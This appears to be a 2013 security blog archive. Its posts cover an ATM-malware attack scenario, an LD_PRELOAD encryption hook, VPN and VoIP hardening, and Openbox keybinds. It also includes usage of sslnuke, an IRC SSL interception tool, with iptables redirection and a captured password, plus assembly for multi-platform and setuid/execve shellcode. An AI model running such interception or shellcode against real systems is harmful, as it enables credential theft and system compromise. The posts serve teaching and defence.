    The reason for the pass statements is that we must return the value 0 or OpenVPN will deny the client entry. If records are not being added, check to make sure that the server is running and that it is in fact running on localhost.

    Now you need to restart OpenVPN in order for the changes to server.conf to go into effect.

    $ sudo service openvpn restart


    Using the default configs with PyTinyDNS, non locally resolved domains are forwarded to the system's default DNS server. In order to avoid information leakage of local common names, you could implement a method to not forward any requests with a particular domain name or disable this option completely by setting the PyTinyDNS option "Resolve_Nonmatch" to no.

    Thursday, October 10, 2013

    Debunking the False Security of Cardless ATMs

    According to CNN, FIS financial services is launching a new way for customers to access cash without an ATM card or debit card. This technology has been piloted by three banks in the recent months using a mobile application called “Cardless Cash Access”, and is slated for widespread implementation by mid-2014. They claim it is safer than using an ATM card. First, lets review the process described there to withdraw from an ATM without the use of a card:

    1. Log into an application on your mobile device that interacts with your bank
    2. Place an order for your cash
    3. Upon arrival to the ATM, use the application to scan a code on the ATM to prove you are physically there
    4. The ATM sees that you are there and relinquishes the requested cash

    This methodology was reviewed by Mary Monahan of Javelin Strategies & Research, and she labeled it as more secure than traditional ATM cards for the following reasons:

    • Because there is no card, there can be no “card skimming”
    • In the event your phone is stolen, the application still needs additional log-in information and PIN information

    A card skimmer is a small hardware device that can be inserted into an ATM to record the information on the ATM card when it is inserted into the machine. Her full analysis of FIS' program, “Cardless Cash Access”, is behind a pay gate; I wasn't about actually pay money for something that should be completely free information. Besides, she's wrong.

    Construction of an ATM “card skimmer” is difficult, and placing one is risky to any potential attacker. Retrieving one could be even riskier. I'd argue that this technology is even less safe than online banking. Online banking can be unsafe due to the fact that malware and software viruses can record information on a victim's computer, allowing criminals access to bank accounts; however, the criminals in question have to jump through many hoops to actually turn this online access into cash that they can use. Usually they lose some of the money in the process, and there's a trail leading back to them. To avoid this they use scams to trick yet more victims into withdrawing and depositing the cash for them, usually with something like western union, so that transactions cant be “charged back” or otherwise tracked back to the criminal.

    With the advent of mobile malware, I've uncovered a hypothetical way that criminals could cause much more severe damage. Similar to computers, mobile phones can be vulnerable to keylogging attacks. A keylogger is a piece of software that allows an attacker to record the buttons pressed on a keyboard, or in this case, the software keyboard on a smart phone. Smart phone keyloggers already exist, and are nothing new. Also similar to computers, proxy software can be installed on a mobile phone. Proxy software is software that allows a user to use a computer or mobile device to make it look like they are coming from the device the proxy is on, as opposed to their real location.

    So what relevance does this have to “Cardless Cash Access”? Its simple, really. An attacker could create a piece of malware that infects a person's smart phone with both a proxy and a keylogger. From there, he could record the information entered into the application. After that, it would be trivial to install the application on his own mobile device, log in, request cash, and scan the ATM code. Suppose for a moment that this didn't work, for whatever reason (like the application being locked on a per-user basis to a particular phone). At this point, the attacker could use a proxy in the malware to impersonate the victim's phone, upload the scanned key to the application from the victim's phone, resulting in the ATM dispensing the cash anyway. Not only does this make it easier for cybercriminals to access the data required without physical intervention, it also makes it easier for a criminal to turn his access directly into cash without using a scam or jumping through the various hoops required while using a skimmer. There is also much less risk involved to the criminal. To hide his or her identity and “cash out”, the criminal only need bring a can of black spray paint to the ATM camera.

    I talked with a mobile malware analyst, Matt McDevitt, to get an idea of how easy it would be for a malware author to write such a virus, and to determine the likelihood of such an attack. He responded saying that it would be incredibly easy for a malware author to write and deliver such a virus, and that the likelihood of such a virus being written is extreme. He further went on to say, "another [malicious] provider could come out with a trojanized version of this application". What he means here is that someone could unpack the "Cardless Cash Access" application, backdoor it, and then pack it back up for shipping to unsuspecting users. There is also the risk of a supply chain attack, which is by far more sophisticated, but not impossible. Supply chain attacks are used by some of the world's brightest computer criminals. If the master copy of "Cardless Cash Access" to be distributed to all of the end users were to be compromised, the entire financial grid could become at risk.

    I was able to come up with several ideas for making this model more secure, however they all involve more “big brother” type things. For example, a thumbprint scanner at the ATM could work just as well, or using the cellular GPRS data to confirm that the user is actually physically in the same cellular grid that the ATM was located in would be a good start. However, many privacy advocates (including myself) prefer disabling GPRS and dislike giving their thumbprint to machines.

    Moving on, there is another feasibility problem with the “Cardless Cash Access” program. Sometimes there are cellular connectivity problems in the areas ATM's are located in. To address this, FIS has proposed an “offline mode” that would allow usage of the application on the phone regardless of connectivity problems. This is nothing but an opening for “replay” attacks in which an attacker could record the data from an “offline mode” transaction and “replay” the data into an ATM, making it dispense the cash.

    In conclusion, this cardless ATM methodology removes much of the risk of getting caught from criminals intent on stealing money. While Mary Monahan is quoted as saying, "The phone is becoming a security blanket; the more you can do with it, the better,”; attackers have been using mobile devices as a proverbial malware playground. With mobile malware on the rise, the less control a phone has over your real life, the better.

    Tuesday, September 17, 2013

    CryptHook: Secure TCP/UDP Connection Wrapper


    CryptHook is a modular implementation for securing existing applications with symmetrical block cipher encryption. It works by hooking the base system calls for network communication send/sendto and recv/recvfrom. CryptHook will work with existing applications that rely on these system calls.

    Download the Code

    $ git clone
    $ wget

    Hooking the Calls

    Hooking system calls is relatively simple, and is often used to deploy userland rootkits such as Jynx/Jynx2. For this, we're really only interested in hooking four system calls, as previously mentioned. With these hooks, we are able to intercept any data before it is sent across the network (for encryption), and also any data before it touches the client/server application (for decryption).

    static ssize_t (*old_recv)(int sockfd, void *buf, size_t len, int flags);
    static ssize_t (*old_send)(int sockfd, void *buf, size_t len, int flags);
    static ssize_t (*old_recvfrom)(int sockfd, void *buf, size_t len, int flags, struct sockaddr *src_addr, socklen_t *addrlen);
    static ssize_t (*old_sendto)(int sockfd, void *buf, size_t len, int flags, const struct sockaddr *dest_addr, socklen_t addrlen);
    ssize_t recv(int sockfd, void *buf, size_t len, int flags) {
    ssize_t recvfrom(int sockfd, void *buf, size_t len, int flags, struct sockaddr *src_addr, socklen_t *addrlen) { 
    ssize_t send(int sockfd, const void *buf, size_t len, int flags) {
    ssize_t sendto(int sockfd, const void *buf, size_t len, int flags, const struct sockaddr *dest_addr, socklen_t addrlen) {

    Encrypting / Decrypting Data *Updated*

    As part of this proof of concept, I've focused primarily on Advanced Encryption Standard (AES). CryptHook is now only set up with AES 256 in GMC mode, but it would be relatively simple to implement additional algorithms that are already a part of the OpenSSL library.

    #define BLOCK_CIPHER EVP_aes_256_cbc()  // EVP_aes_256_cbc() and EVP_bf_cbc() have been tested
    #define BLOCK_SIZE 16    // Blowfish = 8 AES = 16
    #define KEY_SIZE 32     // Blowfish is variable, lets go w/ 256 bits

    The key is passed to the library using an environment variable. The plain text is then used to derive a key using PBKDF2 with multiple iterations. If you're going to use this in a live environment, I highly encourage you to change the salt and number of iterations. If no key is passed to the library, it defaults back to PASSPHRASE defined below.

    #define PASSPHRASE "Hello NSA"

    Example Usage

    As discussed earlier, this can be use with many different client/server applications. As a demonstration, lets add a layer of encryption to SSHd.

    Server side:
    $ LD_PRELOAD=./ UC_KEY=OHarroNSA sshd -p 5000
    Client Side:
    $ LD_PRELOAD=./ UC_KEY=OHarroNSA ssh localhost -p 5000

    Wireshark Capture

    As you can see, the packets show up as malformed, because Wireshark doesn't know how to interpret them, and the data is obviously encrypted.

    Going Beyond

    It'd be relatively simple to add an SSL header to each packet so that the packets look even more innocuous to anyone casually observing the transaction. SSL headers for application data are five bytes. Adding a fake SSL handshake immediately upon connection would also be a nice touch.

    [SSL Record Type][SSL Version][Data Length]
    [1 Byte]         [2 Bytes]    [2 Bytes]

    Friday, September 13, 2013

    Linux Kernel Structure Definition Lookup Script


    If you've ever written anything kernel side for Linux, I'm sure you've bashed your head on the keyboard as many times as I have looking through lackluster documentation and scouring source files to find structure definitions. Here's a little script that will show you the source file and line number of the given structure definition.

    First of all, this script relies on a fantastic website that allows you to easily search through the Linux source files I simply wrote a script to parse the output to show structure definition locations. Change the URL in the script depending on your current kernel version number.


    $ ./ crypto_tfm
    [-] Searching for all structure definitions of: crypto_tfm
    [+] drivers/staging/rtl8192e/rtl8192e/rtl_crypto.h, line 186
    [+] drivers/staging/rtl8192u/ieee80211/rtl_crypto.h, line 189
    [+] include/linux/crypto.h, line 413

    The Source

    # Linux Kernel Structure Search
    import sys
    from BeautifulSoup import BeautifulSoup
    import requests
    def main(argv):
     struct_search = "" + argv[0]
     in_struct = 0
     print "[-] Searching for all structure definitions of: " + argv[0]
     req = requests.get(struct_search)
     soup = BeautifulSoup(req.text)
     spanTag = soup.findAll('span')
     for tag in spanTag:
       myclass = tag['class']
       if myclass == 'identtype':
        if tag.string == "Structure":
         in_struct = 1
        elif in_struct:
       if myclass == "resultline" and in_struct:
        aTag = tag.find('a')
        print "[+] " + aTag.text
     if not in_struct:
      print "[-] No Structures Found"
    if __name__ == "__main__":

    Tuesday, September 10, 2013

    sslnuke -- SSL without verification isn't secure!

    A video demonstration of the tool described in this post can be seen at

    We have all heard over and over that SSL without verification is not secure. If an SSL connection is not verified with a cached certificate, it can easily be hijacked by any attacker. So in 2013, one would think we had totally done away with this problem. Browsers cache certificates and very loudly warn the user when a site has offered up a self-verified certificate and should not be trusted, browser vendors have pretty much solved this problem. However, HTTPS is not the only protocol that uses SSL. Unfortunately, many clients for these other protocols do not verify by default and even if they did, there is no guarantee of secure certificate transfer. After all, how many people are willing to pay $50 for an SSL certificate for their FTPS server?

    A common protocol that uses SSL but is rarely verified is IRC. Many IRC clients verify by default, but most users will turn this off because IRC servers administrators tend not to purchase legitimate SSL certificates. Some popular clients even leave SSL verification off by default (IRSSI, for example). We already know that this is unwise, any attacker between a user and the IRC server can offer an invalid certificate and decrypt all of the user's traffic (including possibly sensitive messages). Most users don't even consider this fact when connecting to an SSL "secured" IRC server.

    The purpose of sslnuke is to write a tool geared towards decrypting and intercepting "secured" IRC traffic. There are plenty of existing tools that intercept SSL traffic already, but most of these are geared towards HTTP traffic. sslnuke targets IRC directly in order to demonstrate how easy it is to intercept "secured" communications. sslnuke usage is simple.


    First, add a user account for sslnuke to run as and add iptables rules to redirect traffic to it:

        # useradd -s /bin/bash -m sslnuke
        # grep sslnuke /etc/passwd
        # iptables -t nat -A OUTPUT -p tcp -m owner ! --uid-owner 1000 -m tcp \
          --dport 6697 --tcp-flags FIN,SYN,RST,ACK SYN -j REDIRECT --to-ports 4444

    Finally, login as sslnuke, build, and run sslnuke:

        # su -l sslnuke
        # cd sslnuke
        # make
        # ./sslnuke

    Run an IRC client and login to your favorite IRC network using SSL, IRC messages will be printed to stdout on sslnuke.

        [*] Received connection from:
        [*] Opening connection to:
        [*] Connection Using SSL!
        [*] -> AUTH ( *** Looking up your hostname...
        [*] -> AUTH ( *** Found your hostname
        [*] -> victim ( *** You are connected to with TLSv1.2-AES256-GCM-SHA384-256bits
        [*] -> nickserv ( id hello
        [*] NickServ! -> victim ( Password accepted - you are now recognized.

    sslnuke will automatically detect a client using SSL and determine whether or not to use SSL. The code could also be easily modified to show web site passwords or FTP data, anything using SSL. To attack users on a network, sslnuke can be used in conjunction with an ARP poisoning tool, such as the one found at Blackhat Library or it can be deployed on a gateway.


    Now on to the important part, how do we verify SSL connections? The first step is to transfer the SSL certificate over an alternative medium, the best way would be to have the administrator directly give you the certificate. However, if this is not possible, openssl can download the certificate from the server:

        # openssl s_client -showcerts -connect </dev/null

    Save the certificate into "~/.irssi/ssl/". It is best to run the command from a computer on a different network than yours to prevent this from being intercepted. Next, to configure IRSSI to use the certificate, save a network:

        /network add irc
        /server add -ssl_cafile ~/.irssi/ssl/ -network irc -port 6697

    If IRSSI ever gets an invalid certificate, it will warn you and disconnect immediately. However, for the truly paranoid, a Tor hidden service or VPN should be used. To configure automatic Tor hidden service redirection on Linux one can run the following commands:

        # echo "VirtualAddrNetwork" >> /etc/tor/torrc
        # echo "AutomapHostsOnResolve 1" >> /etc/tor/torrc
        # echo "TransPort 9040" >> /etc/tor/torrc
        # echo "DNSPort 5353" >> /etc/tor/torrc
        # killall -HUP tor
        # iptables -t nat -A OUTPUT -p tcp -d -j REDIRECT --to-ports 9040
        # iptables -t nat -A OUTPUT -p udp --dport 53 -j REDIRECT --to-ports 5353
        # ncat xxxxxxxxxxxxxxx.onion 6667 NOTICE AUTH :*** Looking up your hostname... NOTICE AUTH :*** Couldn't resolve your hostname; using your IP address instead

    Ultimately, IRC clients should use an SSH-style key verification. On first connect, present the certificate fingerprint to the user and force the user to confirm it and then cache the certificate. If it changes the next time, do not allow the connection.


    The source code can be downloaded on Github.

    Saturday, September 7, 2013

    PiBowl: Rasperry Pi Secure (SIPS/SRTP) Asterisk Autoconfig Script


    This is directly related to my last post Create your own Fishbowl: an NSA Approved Telecommunication Network. That tutorial is dedicated to setting up both OpenVPN and Asterisk in order to provide secure end to end VoIP communications. This is part of a new project to make it as easily deployable as possible.

    PiBowl Server

    PiBowl server is the first part of the puzzle. Its specifically designed to be a one stop shop for installing and configuring Asterisk on a Raspberry Pi. For the demonstration, I am assuming that the user has a fresh installation of Raspbian on their SD Card. The installation script has also been tested on Debian Wheezy, and works just the same.

    Getting the Script

    PiBowl is hosted on github. You can either clone the repository, or if you don't feel like installing additional packages, access it directly using the following wget request.

    $ wget
    $ unzip

    Now that you have the script, you really only need to edit two variables defined in

    • AST_IP
    AST_IP is the IP address of the interface that you want TLS to bind to. This prevents external users from probing or accessing Asterisk. The only traffic coming in or out should be through the VPN. ALLOW_CONTACT is the range of IPs that are able to make or receive calls. This is redundant, but ensures that we don't have any unencrypted or unwanted calls taking place.

    Running the Script

    You need to run PiBowl as sudo in order for the install to complete.

    $ sudo ./
    If you're compiling on a Rapsberry Pi, go ahead and make a pot of coffee, bake a pizza, mow the lawn, take a shower, and then come back to see if it's done with the build yet. Interaction is minimal and requires your input while creating the Certificate Authority password used for certificate signing, and when it comes time to build client keys. You can build as many client keys / SIP users as you want during the configuration. Each user will be assigned a semi random password, as well as a sequential dialing extension. Extensions can be changed by tweaking the EXTEN variable in If you need to add users later, simply refer back to the original article for how to do it manually.

    Going Beyond

    Plans are to build similar configs for a client based Raspberry Pi as well. If you'd like to help with the client side, feel free to send pull requests to the github, and I'll merge them in as appropriate. This will hopefully show people that the concept is relatively simple and easy to deploy. As this becomes more user friendly, I hope that it can be used to connect friends and families in a secure manner.

    Friday, September 6, 2013

    Creating your own key-binds in Openbox


    I love being able to control any and every aspect of my computer by utilizing key-binds and macros to do certain tasks. This post is going to go over how to create key-binds in the Openbox desktop environment. Again as my last post I'll be running Crunch Bang as my distribution of choice which comes preconfigured with Openbox. Also because I don't like to steer too far away from the CLI; I will be calling the configs from the per this post.

    The Configuration

    As I discussed in my last tutorial, you can locate the config file by using the find command.

    $ find ~/ -iname rc.xml
    In this case we're going to edit the rc.xml file. Before we can edit that file we need to know which keys we're going to use as shortcuts along with the task that we want that key sequence to execute. So we're going to use a built in tool called 'xev' to find out what keys are called. For the sake of this post I'm going to use left shift and f1 to make a key-bind. So open a terminal and type xev and press enter, then push left shift and you should see an output like this:

    KeyPress event, serial 46, synthetic NO, window 0x4000001,
        root 0x370, subw 0x0, time 326988347, (-740,188), root:(572,1005),
        state 0x11, keycode 50 (keysym 0xffe1, Shift_L), same_screen YES,
        XLookupString gives 0 bytes:
        XFilterEvent returns: False

    Now lets push f1 and see what happens:

    KeyPress event, serial 46, synthetic NO, window 0x4000001,
        root 0x370, subw 0x0, time 327135703, (-576,193), root:(736,1010),
        state 0x10, keycode 67 (keysym 0xffbe, F1), same_screen YES,
        XLookupString gives 0 bytes:
        XmbLookupString gives 0 bytes:
        XFilterEvent returns: False

    What information does this give us? First we have the X11 key name, and we also have the keycode which if we change to hex can be used in place of the X11 key name. So back to the rc.xml file. For simplicity reasons we'll just use the X11 key names, Shift_L and F1 respectively. In the xml file, we need to find the area where keybinds are defined. You should see comments that talks about keybinds like:

    <!-- Keybindings for desktop switching -->
    Now we need to create our own. You can create your keybinds anywhere in the keybind portion of the config file. Use the following format as an example:
    <keybind key="">
         <action name="">
              <command>command goes here</command>
    Remember in this example we're using Shift_L and F1 for the keybind key, openbox has used modifiers for certain keys such as Shift which is an uppercase S and that's what we'll insert instead of Shift_L:
    <keybind key="S-F1">
    For the action name we want it to execute a command:
    <action name="Execute">
    And for the command we'll have it open Iceweasel:
    Our keybind alltogether should look like this
    <keybind key="S-F1">
         <action name="Execute">

    Reload Openbox Configs

    Now that the keybinds have been changed, whenever we use shift + f1 iceweasel opens up. These keybinds can be configured to do anything you want with endless combinations of keybinds and actions. Once you're happy with your current configuration, we need to have openbox reload the config files. In order to accomplish this, type the following into your terminal:
    $ openbox --reconfigure

    Monday, September 2, 2013

    Building a multiplatform shellcode header

    This post is a quick overview of one method used to quickly create machine code capable of branching to up to four different platforms:

    • 32-bit Linux
    • 64-bit Linux
    • 32-bit Windows
    • 64-bit Windows

    The multi-platform process is a multi-step process that can be broken into small pieces of code - first to detect the processor architecture, then to determine operating system.

    Determining Architecture

    When I made my last post, I was reminded of an awesomely shorter technique I found while googling for architecture detection developed by the guys over at Because theirs is shorter (which in my opinion makes it cooler since we aren't focusing on strictly alphanumeric code), I'll use their getCPU in stead of my own for this little demonstration. Admittedly, I changed a 'jz' to a 'jnz' and re-ordered the code a little bit. Instead of bits_32 we're going to have a determine_32_os label:

      xorl %eax, %eax
      jnz determine_32_os

    This is a 6-byte header that works on both windows and linux for determining the CPU architecture, so lets get started with determining the operating system.

    Determining operating system using segment registers


    Apparently something was seriously wrong with my testing environment. Whether it was due to virtualization or this or that, we suspect that the controversy came from running windows 8.1 in a VM on an amd system with the VM providing an intel interface. In any case, here's the work-around that doesn't rely on the parity bit: segment registers.

    All of the segment registers aren't always used by the operating system's runtime environment. In the case of windows, the %ds segment register is nearly always set, whereas in linux, it is nearly always zero. To that end, we can use the following snippet of code to determine operating system by testing for a zero value in the %ds segment register (zero means linux), but this is only valid for 64 bit. In a 32 bit world, %fs is 0 on linux while it has a value on windows:
      mov %ds, %eax
      test %eax, %eax
      jnz win64_code
      jmp lin64_code
      mov %fs, %eax
      test %eax, %eax
      jz lin32_code 

    Final code:

    The final version of this header comes out to a 20 bytes that could definitely be made shorter:
      xorl %eax, %eax
      jnz determine_32_os
      mov %ds, %eax
      test %eax, %eax
      jnz win64_code
      jmp lin64_code
      mov %fs, %eax
      test %eax, %eax
      jz lin32_code 

    And it disassembles to:

    0000000000000001 :
       1: 31 c0                 xor    %eax,%eax
       3: 40 90                 rex xchg %eax,%eax
       5: 75 08                 jne    f 
    0000000000000007 :
       7: 8c d8                 mov    %ds,%eax
       9: 85 c0                 test   %eax,%eax
       b: 75 0a                 jne    17 
       d: eb 07                 jmp    16 
    000000000000000f :
       f: 8c e0                 mov    %fs,%eax
      11: 85 c0                 test   %eax,%eax
      13: 74 03                 je     18 
    0000000000000015 :
      15: 90                    nop
    0000000000000016 :
      16: 90                    nop
    0000000000000017 :
      17: 90                    nop
    0000000000000018 :
      18: 90                    nop

    Further reading:

    Friday, August 30, 2013

    Create Your Own Fishbowl, An NSA Approved Telecommunication Network


    With all the media attention about government spying, NSA data collection and intercepts, FISA courts, Snowden, etc... people are finally waking up and realizing that they need to take steps to actively protect themselves on the Internet. As society becomes more and more connected, the possibility of data theft and corruption grows even more. Be honest though. Are you really surprised?
    Now with that out of the way, what technologies are out there that can help safeguard us safe from the government, crooks, and nosy neighbors? The obvious answer is encryption, and layered security. How can we apply this to telecommunications that will work for us on the go and at home? The NSA actually was kind enough to provide us with the specifications needed to build our own clone of an infrastructure that is trusted to protect up to Top Secret classified material and communications.

    The NSA's Mobility Capability Package

    In 2012, the NSA presented their 100 page document describing the Mobility Capability Package to RSA Conference 2012. In order to spare you the details of 116 pages of agency and technical speak, here are the basic components of MCP.

    • Secure Voice Over IP (SVoIP) must have the following requirements
      • Network must be based on an IPsec VPN
      • SIP must use TLS to encrypt signaling exchange
      • SRTP will be used to encrypt voice communications
    • Secure Browsing must have the following requirements
      • Network must be based on an IPsec VPN
      • Servers will enforce TLS connections
      • The web browser on the User Equipment is configured to prohibit the storing or caching of any data in non-volatile memory.

    For the time being, we're going to disregard the requirements for web, email etc. We're solely focused on the SVoIP and VPN setup. I know that the requirements now state the use of an IPsec VPN, but the original requirements they planned on using an SSL based VPN. Due to inter-operability issues with proprietary SSL VPNs, the NSA elected to go with IPsec. For ease of setup and use, we're going to use OpenVPN for this article, which of course is an SSL VPN.

    Our Requirements

    • Computer hosting OpenVPN as a server
    • Computer hosting Asterisk as a server
    • Client running OpenVPN client configuration
    • Client running VoIP software capable of using TLS + SIP + SRTP
    This configuration can be used for secure communication with end to end PCs and cellular telephones alike (iOS and Android both have VoIP clients in their respective stores that support SRTP and SIP + TLS.)

    Setting up OpenVPN

    Whether you choose to run OpenVPN and Asterisk from your desktop, on a Raspberry Pi, in a virtual instance, on a VPS, or a dedicated solution, go ahead and prep your environment. For consistency sake, I'm going to show the commands to do the setup on a Debian based distro.

    Install OpenVPN

    sudo apt-get install openvpn

    Set up your own Certificate Authority (CA).

    We already discussed that PKI is a requirement for our little project, because we're not going to use a static configuration due to security concerns. This allows each client to have his/her own public/private key pair. The first step is to setup our own local Certificate Authority (CA). Fortunately, OpenVPN comes with a tool suite designed to keep PKI management simple. It's called "easy-rsa." Now, depending upon your distribution and packaging system, it may be installed in various directories. For Debian, it's /usr/doc/openvpn/examples/easy-rsa/2.0. Go ahead and copy that directory into your VPN user's home directory.
    # cp -r /usr/doc/openvpn/examples/easy-rsa/2.0 ~/easy-rsa
    # cd ~/easy-rsa
    Now, using your favorite editor, open up the file named vars.
    # vi vars
    As you can see, you can define key length and other variables associated with the keys that will be generated while using the easy-rsa suite. Go ahead and make any changes that you feel necessary for this step. You will be asked again if you want to change any of the variables listed at the bottom during the key building process.
    Now we're going to build the actual CA certificates with the following commands.
    # . ./vars
    # ./clean-all
    # ./build-ca
    Follow the prompts and change anything that you may have forgotten about in the vars file.

    Build OpenVPN Client / Server & DH Keys

    # ./build-key-server fishbowl
    # ./build-key client1
    # ./build-key client2
    # ./build-dh
    Again, follow the prompts for each command in order to generate the required key pairs.
    It is important to note that each private key (file type ends in .key) must be protected in order to maintain network integrity. Key exchanges must be conducted across secure lines of communication. This could involve directly handing over the keys in person on an encrypted device, it could be a prearranged symmetric cryptography solution, it could be anything only limited by your imagination.

    Configure OpenVPN Server File

    I have an example configuration available over on Github. If you'd like to change any of the variables, please do so at this time. You can change listening address, LAN IP space, key locations and so on. Save the server.conf file to /etc/openvpn/server.conf. Now we need to pull in the keys we previously created using easy-rsa.
    # cp -r ~/easy-rsa/keys /etc/openvpn/keys
    # chmod 700 /etc/openvpn/keys

    Start OpenVPN Server

    # openvpn /etc/openvpn/server.conf

    Configure the Client for OpenVPN

    As previously discussed, transferring private key requires a great deal of thought and security. You should have a chosen method for key distribution (one that involves physical mediums and not transmitting the keys over plaintext protocols), and sent the clients the following files.
    • client.key
    • client.crt
    • ca.crt
    • fishbowl.conf
    For my example fishbowl.conf, just clone the github repo over at Fish Bowl Configs. You will need to change the server IP address in order to match it back to your own OpenVPN server.
    You now have a fully functional VPN configuration. Generate as many client keys as needed, and send them the appropriate configuration files. Now, its time to move on to Asterisk.

    Setting up Asterisk

    Asterisk is a full featured, open source PBX solution that includes all of the supported features that we require for this exercise. First of all, we're going to go ahead and install Asterisk onto our respective servers. Again, you can host this on the same box as the VPN or on any number of platform choices. If you're going to run it on another computer, you'll need to generate VPN keys so that it can connect through the VPN. Use the previous steps to set this up. I am again giving the commands for installing this on a Debian based system. For my configuration, I'll be placing the Asterisk box on the same server as OpenVPN. Keep this in mind, and change your IPs / Network segments accordingly.

    Installing Asterisk

    # apt-get install asterisk

    Generate TLS keys for use with SIP

    Now we will generate the required keys in order to use TLS to encrypt our SIP signalling. First we need to create the directory to store our keys in. Similar to OpenVPN, Asterisk also comes with its own scripts to help ease the task of creating cryptographic keys. The script comes in "contrib/scripts/ast_tls_cert." In case you're using the Debian packages, I've included a copy in the github repository. You'll be asked for a password to be using with the Certificate Authority for signing additional keys. Pick something secure that you'll be able to remember in the future as well.
    # mkdir /etc/asterisk/keys
    # ./ast_tls_cert -C -O "Fish Bowl Communications" -d /etc/asterisk/keys
    This created quite a few files under /etc/asterisk/keys. The ca.crt is important, because it will be required in order to distribute to the clients. We also still need to create additional keys for the clients in order for them to be able to communicate with Asterisk. Go ahead and create two certificates for client1 and client2 respectively.
    # ./ast_tls_cert -m client -c /etc/asterisk/keys/ca.crt -k /etc/asterisk/keys/ca.key -C client1 -O "Fish Bowl Communications" -d /etc/asterisk/keys -o client1
    # ./ast_tls_cert -m client -c /etc/asterisk/keys/ca.crt -k /etc/asterisk/keys/ca.key -C client2 -O "Fish Bowl Communications" -d /etc/asterisk/keys -o client2
    After completing the above steps, you can see that the following files were created in /etc/asterisk/keys.
    • asterisk.crt
    • asterisk.csr
    • asterisk.key
    • asterisk.pem
    • client1.crt
    • client1.csr
    • client1.key
    • client1.pem
    • client2.crt
    • client2.csr
    • client2.key
    • client2.pem
    • ca.cfg
    • ca.crt
    • ca.key
    • tmp.cfg
    In order for the clients to be able to connect, you need to add client1.pem or client2.pem (depending on the client) to their computer along with ca.crt. We'll cover client configuration later.

    Configure sip.conf

    Now that our certificates are in order for SIP, we'll go ahead and walk through the configuration of SIP in Asterisk. Open up /etc/asterisk/sip.conf with your favorite editor and lets get to work. Remember, all of my configs can be downloaded over on the FishBowl github
    The first section you're going to come to that needs to be changed is the UDP/TCP bind area. You can comment out the sections dealing with bind address for both, because we are going to require that TLS be used as the transport medium. Once you come across the the lines regarding TLS configuration, we need to start making changes. Make sure that you substitute for your own IP address.
    Ensure that TLS is enabled, and change the bind address to match your VPN IP respectively. We don't want it listening to external interfaces in order to minimize the chance of data leakage.
    Once it gets to the transport medium, we want to force TLS only. Normally the options are TCP or UDP.
    There's another option to further help us lock down who is able to use the Asterisk server. Again, change the IP and Netmask to match your VPN settings. The allowguest denies contacting anyone not associated with the VPN.
    The last main option that we need to change other than adding clients in our case is to FORCE real time media streaming encryption with SRTP. The call will drop if both parties do not offer SRTP support.
    Setup two clients in the SIP config at the bottom of the file.
    context=local      ; this will be used in extensions.conf
    allow=g722         ; choose the codecs that you prefer here.
    context=local      ; this will be used in extensions.conf
    allow=g722         ; choose the codecs that you prefer here.
    Now we are able to login to the Fish Bowl Communications Network. We cannot however place any legitimate calls, until we setup the extensions.

    Configuring extensions.conf

    We're only going to cover the most basic of extension configuration in this article, as the sole focus is not on the Asterisk system. Books have been written and dedicated to that subject already. Open up extensions.conf, and go down to the [local] section, because that is the context that is given to both client1 and client2. We're simply going to add a Dial call routine and add an extension for each of the SIP clients.
    exten => 100,1,Dial(SIP/client1)
    exten => 101,1,Dial(SIP/client2)
    The above configuration will dial client1 if anyone dials extension 100 and client2 if anyone dials extension 200. The 1 here indicates that it is the first step in the call process. Asterisk allows you to setup extensive voice prompts and menus for callers as well as setup conference bridges, fax documents, voice mails, call parking lots etc etc. This will however meet our BARE requirements in making secure phone calls over a VPN with fully encrypted SVoIP. Keep in mind that we need to safeguard keys when transferring them, and client1.pem/client2.pem both contain private keys along with the client certificates.

    Client Configuration

    There are multiple clients available across various platforms that support TLS + SRTP communication methods. I'll show an example of configuring SFLPhone for Linux based systems. The Asterisk wiki contains a good demonstration of setting up Blink on Linux, Windows, or Mac. See resources at the bottom for Blink configuration. If you're using a mobile client, these same principles will apply, and setup on multiple clients should be pretty straight forward.


    Go ahead and install SFLPhone, if you're using Debian based systems, the following will get you started.
    # apt-get install sflphone-gnome
    Once the client is installed, go ahead and start it up. You can use the configuration wizard in order to get you started with configuring the account. Further manipulation will be necessary though. The first screen is a welcome message, press Continue to go on.

    Register an existing SIP or IAX2 account

    SIP (Session Initiation Protocol)

    Fill out Client Information as Shown

    No STUN Server is Needed

    Click Apply and then Close. This is as far as the configuration wizard will take us. From here, we need to go to Edit Menu -> Accounts. Select client1 from the list and click on edit.

    Click on the security tab. For SRTP exchange select SDES. Then select "Use TLS Transport(sips)" and click on Edit.

    Once you're to the advanced security settings, this is where you select the ca.crt and client1.pem files in order to allow TLS to associate your client with the server. Server name should be the Asterisk box, and the default port is 5061 (unless you changed it in sip.conf). Your settings should generally look like the following.

    That's it for client configuration. Go ahead and click apply, and select / deselect the option next to client 1 under the accounts menu. Once it associates with the server, you should see a message stating that you are "registered" with the server. Assuming that client2 is also connected, go ahead and give him a call and test out the audio (remember client2 is extension 101 as we set it earlier.) You may need to switch up codecs depending on connection speed and application.

    Going beyond

    The possibilities are truly endless when it comes to customizing these configurations. One thing that is nice to have is an analog phone converter like the Linksys PAP2T. This type of device allows you to use a normal telephone with the same secure setup. Ensure that your converter supports both TLS and SRTP, if you're going to use this setup. Experiment with adding phone bridges, trunking multiple Asterisk boxes together across the VPN. This article should have provided you with enough information to get you up and running. If you want more specific details, go to the respective wiki links as both Asterisk and OpenVPN have great support networks.


    Thursday, August 29, 2013

    Building multi-architecture shellcode with shellcodecs

    Earlier when I documented alphanumeric shellcode I released a stub that allows you to determine the x86 cpu architecture that I called a 'getcpu'. Using a few tools from shellcodecs, I was able to combine it with a couple of other shellcodes and test the compatibility locally.

    Building a 32-bit shellcode loader on a multilib system

    The first thing I did was take the 32-bit loader found in shellcodecs and built it on my 64-bit system to get a decent test environment going.
    root@box:~/Downloads/shellcode/loaders# as --32 loader-32.s -o loader-32.o
    root@box:~/Downloads/shellcode/loaders# ld -m elf_i386 loader-32.o -o loader-32

    Initial codes

    I picked out two setuid(0); execve('/bin/bash',null,null) shellcodes: a 32-bit shellcode used in our buffer overflow wiki, and the 64-bit version that I wrote for shellcodecs, giving us the three portions of code below.
    • The getCPU stub:
    • The 32-bit payload:
    • The 64-bit payload:
    I got the 64-bit payload using the following command from a compiled shellcodecs installation:
    generators/ --file null-free/setuid_binsh --hex

    Tying them together

    The 64-bit payload is 32 bytes. In hex, this is represented with 0x20 or \x20. Because the getCPU sets the zflag on 32-bit and doesn't on 64-bit, I took the GetCPU and added a conditional jump if equal 0x20 ("t\x20"):
